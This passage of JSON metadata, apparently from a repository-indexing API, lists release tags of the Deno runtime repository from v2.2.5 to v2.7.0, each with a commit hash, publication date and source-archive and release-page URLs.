https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"p